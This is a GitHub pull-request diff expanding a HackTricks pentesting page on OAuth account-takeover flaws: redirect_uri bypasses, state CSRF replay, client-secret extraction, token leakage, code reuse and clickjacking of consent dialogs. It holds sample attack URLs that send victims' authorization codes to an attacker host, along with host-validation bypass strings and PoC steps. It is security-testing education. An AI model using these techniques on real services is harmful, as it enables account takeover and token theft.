Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
81 changes: 63 additions & 18 deletions src/pentesting-web/oauth-to-account-takeover.md
Original file line number Diff line number Diff line change
Expand Up @@ -62,13 +62,25 @@ Host: socialmedia.com

### Open redirect_uri <a href="#cc36" id="cc36"></a>

The `redirect_uri` is crucial for security in OAuth and OpenID implementations, as it directs where sensitive data, like authorization codes, are sent post-authorization. If misconfigured, it could allow attackers to redirect these requests to malicious servers, enabling account takeover.
Per [RFC 6749 §3.1.2](https://www.rfc-editor.org/rfc/rfc6749#section-3.1.2), the authorization server must redirect the browser only to **pre-registered, exact redirect URIs**. Any weakness here lets an attacker send a victim through a malicious authorization URL so that the IdP delivers the victim’s `code` (and `state`) straight to an attacker endpoint, who can then redeem it and harvest tokens.

Exploitation techniques vary based on the authorization server's validation logic. They can range from strict path matching to accepting any URL within the specified domain or subdirectory. Common exploitation methods include open redirects, path traversal, exploiting weak regexes, and HTML injection for token theft.
Typical attack workflow:

Besides `redirect_uri`, other OAuth and OpenID parameters like `client_uri`, `policy_uri`, `tos_uri`, and `initiate_login_uri` are also susceptible to redirection attacks. These parameters are optional and their support varies across servers.
1. Craft `https://idp.example/auth?...&redirect_uri=https://attacker.tld/callback` and send it to the victim.
2. The victim authenticates and approves the scopes.
3. The IdP redirects to `attacker.tld/callback?code=<victim-code>&state=...` where the attacker logs the request and immediately exchanges the code.

For those targeting an OpenID server, the discovery endpoint (`**.well-known/openid-configuration**`) often lists valuable configuration details like `registration_endpoint`, `request_uri_parameter_supported`, and "`require_request_uri_registration`. These details can aid in identifying the registration endpoint and other configuration specifics of the server.
Common validation bugs to probe:

- **No validation** – any absolute URL is accepted, resulting in instant code theft.
- **Weak substring/regex checks on the host** – bypass with lookalikes such as `evilmatch.com`, `match.com.evil.com`, `match.com.mx`, `matchAmatch.com`, `evil.com#match.com`, or `[email protected]`.
- **IDN homograph mismatches** – validation happens on the punycode form (`xn--`), but the browser redirects to the Unicode domain controlled by the attacker.
- **Arbitrary paths on an allowed host** – pointing `redirect_uri` to `/openredirect?next=https://attacker.tld` or any XSS/user-content endpoint leaks the code either through chained redirects, Referer headers, or injected JavaScript.
- **Directory constraints without normalization** – patterns like `/oauth/*` can be bypassed with `/oauth/../anything`.
- **Wildcard subdomains** – accepting `*.example.com` means any takeover (dangling DNS, S3 bucket, etc.) immediately yields a valid callback.
- **Non-HTTPS callbacks** – letting `http://` URIs through gives network attackers (Wi-Fi, corporate proxy) the opportunity to snatch the code in transit.

Also review auxiliary redirect-style parameters (`client_uri`, `policy_uri`, `tos_uri`, `initiate_login_uri`, etc.) and the OpenID discovery document (`/.well-known/openid-configuration`) for additional endpoints that might inherit the same validation bugs.

### XSS in redirect implementation <a href="#bda5" id="bda5"></a>

Expand All @@ -80,13 +92,23 @@ https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard</scrip

### CSRF - Improper handling of state parameter <a href="#bda5" id="bda5"></a>

In OAuth implementations, the misuse or omission of the **`state` parameter** can significantly increase the risk of **Cross-Site Request Forgery (CSRF)** attacks. This vulnerability arises when the `state` parameter is either **not used, used as a static value, or not properly validated or associated with the users session** while logging in, allowing attackers to bypass CSRF protections.
The `state` parameter is the Authorization Code flow CSRF token: the client must generate a **cryptographically random value per browser instance**, persist it somewhere only that browser can read (cookie, local storage, etc.), send it in the authorization request, and reject any response that does not return the same value. Whenever the value is static, predictable, optional, or not tied to the user’s session, the attacker can finish their own OAuth flow, capture the final `?code=` request (without sending it), and later coerce a victim browser into replaying that request so the victim account becomes linked to the attacker’s identity provider profile.

The replay pattern is always the same:

1. The attacker authenticates against the IdP with their account and intercepts the last redirect containing `code` (and any `state`).
2. They drop that request, keep the URL, and later abuse any CSRF primitive (link, iframe, auto-submitting form) to force the victim browser to load it.
3. If the client does not enforce `state`, the application consumes the attacker’s authorization result and logs the attacker into the victim’s app account.

Attackers can exploit this by intercepting the authorization process to link their account with a victim's account, leading to potential **account takeovers** by making a user login with an almost finalizehd oauth flow belonging to the attacker. This is especially critical in applications where OAuth is used for **authentication purposes**.
A practical checklist for `state` handling during tests:

Real-world examples of this vulnerability have been documented in various **CTF challenges** and **hacking platforms**, highlighting its practical implications. The issue also extends to integrations with third-party services like **Slack**, **Stripe**, and **PayPal**, where attackers can redirect notifications or payments to their accounts.
- **Missing `state` entirely** – if the parameter never appears, the whole login is CSRFable.
- **`state` not required** – remove it from the initial request; if the IdP still issues codes that the client accepts, the defense is opt-in.
- **Returned `state` not validated** – tamper with the value in the response (Burp, MITM proxy). Accepting mismatched values means the stored token is never compared.
- **Predictable or purely data-driven `state`** – many apps stuff redirect paths or JSON blobs into `state` without mixing in randomness, letting attackers guess valid values and replay flows. Always prepend/append strong entropy before encoding data.
- **`state` fixation** – if the app lets users supply the `state` value (e.g., via crafted authorization URLs) and reuses it throughout the flow, an attacker can lock in a known value and reuse it across victims.

Proper handling and validation of the **`state` parameter** are crucial for safeguarding against CSRF and securing the OAuth flow.
PKCE can complement `state` (especially for public clients) by binding the authorization code to a code verifier, but web clients must still track `state` to prevent cross-user CSRF/account-linking bugs.

### Pre Account Takeover <a href="#ebe4" id="ebe4"></a>

Expand All @@ -95,9 +117,12 @@ Proper handling and validation of the **`state` parameter** are crucial for safe

### Disclosure of Secrets <a href="#e177" id="e177"></a>

Identifying and protecting secret OAuth parameters is crucial. While the **`client_id`** can be safely disclosed, revealing the **`client_secret`** poses significant risks. If the `client_secret` is compromised, attackers can exploit the identity and trust of the application to **steal user `access_tokens`** and private information.
The `client_id` is intentionally public, but the **`client_secret` must never be recoverable by end users**. Authorization Code deployments that embed the secret in **mobile APKs, desktop clients, or single-page apps** effectively hand that credential to anyone who can download the package. Always inspect public clients by:

A common vulnerability arises when applications mistakenly handle the exchange of the authorization `code` for an `access_token` on the client-side rather than the server-side. This mistake leads to the exposure of the `client_secret`, enabling attackers to generate `access_tokens` under the guise of the application. Moreover, through social engineering, attackers could escalate privileges by adding additional scopes to the OAuth authorization, further exploiting the application's trusted status.
- Unpacking the APK/IPA, desktop installer, or Electron app and grepping for `client_secret`, Base64 blobs that decode to JSON, or hard-coded OAuth endpoints.
- Reviewing bundled config files (plist, JSON, XML) or decompiled strings for client credentials.

Once the attacker extracts the secret they only need to steal any victim authorization `code` (via a weak `redirect_uri`, logs, etc.) to independently hit `/token` and mint access/refresh tokens without involving the legitimate app. Treat public/native clients as **incapable of holding secrets**—they should instead rely on PKCE (RFC 7636) to prove possession of a per-instance code verifier instead of a static secret. During testing, confirm whether PKCE is mandatory and whether the backend actually rejects token exchanges that omit either the `client_secret` **or** a valid `code_verifier`.

### Client Secret Bruteforce

Expand All @@ -120,11 +145,25 @@ Once the client has the **code and state**, if it's **reflected inside the Refer

### Access Token Stored in Browser History

Go to the **browser history and check if the access token is saved in there**.
The core guarantee of the Authorization Code grant is that **access tokens never reach the resource owner’s browser**. When implementations leak tokens client-side, any minor bug (XSS, Referer leak, proxy logging) becomes instant account compromise. Always check for:

- **Tokens in URLs** – if `access_token` appears in the query/fragment, it lands in browser history, server logs, analytics, and Referer headers sent to third parties.
- **Tokens transiting untrusted middleboxes** – returning tokens over HTTP or through debugging/corporate proxies lets network observers capture them directly.
- **Tokens stored in JavaScript state** – React/Vue stores, global variables, or serialized JSON blobs expose tokens to every script on the origin (including XSS payloads or malicious extensions).
- **Tokens persisted in Web Storage** – `localStorage`/`sessionStorage` retain tokens long after logout on shared devices and are script-accessible.

Any of these findings usually upgrades otherwise “low” bugs (like a CSP bypass or DOM XSS) into full API takeover because the attacker can simply read and replay the leaked bearer token.

### Everlasting Authorization Code

The **authorization code should live just for some time to limit the time window where an attacker can steal and use it**.
Authorization codes must be **short-lived, single-use, and replay-aware**. When assessing a flow, capture a `code` and:

- **Test the lifetime** – RFC 6749 recommends minutes, not hours. Try redeeming the code after 5–10 minutes; if it still works, the exposure window for any leaked code is excessive.
- **Test sequential reuse** – send the same `code` twice. If the second request yields another token, attackers can clone sessions indefinitely.
- **Test concurrent redemption/race conditions** – fire two token requests in parallel (Burp intruder, turbo intruder). Weak issuers sometimes grant both.
- **Observe replay handling** – a reuse attempt should not only fail but also revoke any tokens already minted from that code. Otherwise, a detected replay leaves the attacker’s first token active.

Combining a replay-friendly code with any `redirect_uri` or logging bug allows persistent account access even after the victim completes the legitimate login.

### Authorization/Refresh Token not bound to client

Expand Down Expand Up @@ -155,12 +194,7 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
}
```

For more detailed info about how to abuse AWS cognito check:


{{#ref}}
https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html
{{#endref}}
For more detailed info about how to abuse AWS Cognito check [AWS Cognito - Unauthenticated Enum Access](https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html).

### Abusing other Apps tokens <a href="#bda5" id="bda5"></a>

Expand Down Expand Up @@ -190,6 +224,16 @@ As [**explained in this video**](https://www.youtube.com/watch?v=n9x7_J_a_7Q), i
- `response_mode=form_post` -> The code is provided inside a POST form with an input called `code` and the value
- `response_mode=web_message` -> The code is send in a post message: `window.opener.postMessage({"code": "asdasdasd...`

### Clickjacking OAuth consent dialogs

OAuth consent/login dialogs are ideal clickjacking targets: if they can be framed, an attacker can overlay custom graphics, hide the real buttons, and trick users into approving dangerous scopes or linking accounts. Build PoCs that:

1. Load the IdP authorization URL inside an `<iframe sandbox="allow-forms allow-scripts allow-same-origin">`.
2. Use absolute positioning/opacity tricks to align fake buttons with the hidden **Allow**/**Approve** controls.
3. Optionally pre-fill parameters (scopes, redirect URI) so the stolen approval immediately benefits the attacker.

During testing verify that IdP pages emit either `X-Frame-Options: DENY/SAMEORIGIN` or a restrictive `Content-Security-Policy: frame-ancestors 'none'`. If neither is present, demonstrate the risk with tooling like [NCC Group’s clickjacking PoC generator](https://github.com/nccgroup/clickjacking-poc) and record how easily a victim authorizes the attacker’s app. For additional payload ideas see [Clickjacking](clickjacking.md).

### OAuth ROPC flow - 2 FA bypass <a href="#b440" id="b440"></a>

According to [**this blog post**](https://cybxis.medium.com/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96), this is an OAuth flow that allows to login in OAuth via **username** and **password**. If during this simple flow a **token** with access to all the actions the user can perform is returned then it's possible to bypass 2FA using that token.
Expand Down Expand Up @@ -256,5 +300,6 @@ In mobile OAuth implementations, apps use **custom URI schemes** to receive redi
- [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
- [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
- [**https://blog.doyensec.com/2025/01/30/oauth-common-vulnerabilities.html**](https://blog.doyensec.com/2025/01/30/oauth-common-vulnerabilities.html)
- [An Offensive Guide to the OAuth 2.0 Authorization Code Grant](https://www.nccgroup.com/research-blog/an-offensive-guide-to-the-authorization-code-grant/)

{{#include ../banners/hacktricks-training.md}}